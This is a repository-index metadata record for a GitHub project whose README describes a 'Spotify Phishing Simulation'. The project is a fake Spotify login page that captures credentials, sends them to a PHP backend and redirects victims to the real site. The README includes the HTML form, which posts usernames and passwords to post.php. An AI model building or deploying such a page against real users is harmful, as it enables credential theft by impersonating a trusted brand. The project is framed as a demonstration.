{"id":23594195,"url":"https://github.com/chihab357/phishing-attack","last_synced_at":"2025-10-14T21:38:13.538Z","repository":{"id":268584180,"uuid":"904832755","full_name":"Chihab357/Phishing-Attack","owner":"Chihab357","description":"Création d'une application web imitant Spotify pour collecter et analyser les données d’utilisateurs. Et, utilisation de technologies web (HTML, CSS, JavaScript) pour concevoir une interface réaliste.","archived":false,"fork":false,"pushed_at":"2024-12-17T16:42:29.000Z","size":971,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-15T02:45:12.212Z","etag":null,"topics":["cybersecurity","html","phishing-attacks","php","software-defined-networking"],"latest_commit_sha":null,"homepage":"","language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Chihab357.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-12-17T16:29:04.000Z","updated_at":"2024-12-17T16:44:32.000Z","dependencies_parsed_at":null,"dependency_job_id":"c6187882-2b3c-4bf0-8df1-c4a8eb6c7fa3","html_url":"https://github.com/Chihab357/Phishing-Attack","commit_stats":null,"previous_names":["chihab357/phishing-attack"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Chihab357/Phishing-Attack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chihab357%2FPhishing-Attack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chihab357%2FPhishing-Attack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chihab357%2FPhishing-Attack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chihab357%2FPhishing-Attack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Chihab357","download_url":"https://codeload.github.com/Chihab357/Phishing-Attack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chihab357%2FPhishing-Attack/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279021373,"owners_count":26087023,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-14T02:00:06.444Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","html","phishing-attacks","php","software-defined-networking"],"created_at":"2024-12-27T09:15:57.478Z","updated_at":"2025-10-14T21:38:13.502Z","avatar_url":"https://github.com/Chihab357.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🎣 **Spotify Phishing Simulation**\n\n![Phishing GIF](https://media1.tenor.com/m/SRy6HR5ibvsAAAAd/phishing-phisher.gif)\n\n## 📌 **Project Overview**  \nThis project demonstrates a **phishing attack** by creating a web application that mimics the **Spotify login page**. The interface captures user credentials and forwards them to the backend, then redirects to the real Spotify page.\n\n---\n\n## 🛠️ **Technologies Used**  \n- **Frontend:** HTML, CSS, JavaScript  \n- **Backend:** PHP  \n\n---\n\n## 📄 **Code**  \n\n### HTML (index.html)\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n    \u003cmeta charset=\"UTF-8\"\u003e\n    \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"\u003e\n    \u003ctitle\u003eSpotify Login\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n    \u003cform action=\"post.php\" method=\"POST\"\u003e\n        \u003ch2\u003eLogin to Spotify\u003c/h2\u003e\n        \u003cinput type=\"text\" name=\"username\" placeholder=\"Username\" required\u003e\u003cbr\u003e\n        \u003cinput type=\"password\" name=\"password\" placeholder=\"Password\" required\u003e\u003cbr\u003e\n        \u003cbutton type=\"submit\"\u003eLogin\u003c/button\u003e\n    \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchihab357%2Fphishing-attack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchihab357%2Fphishing-attack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchihab357%2Fphishing-attack/lists"}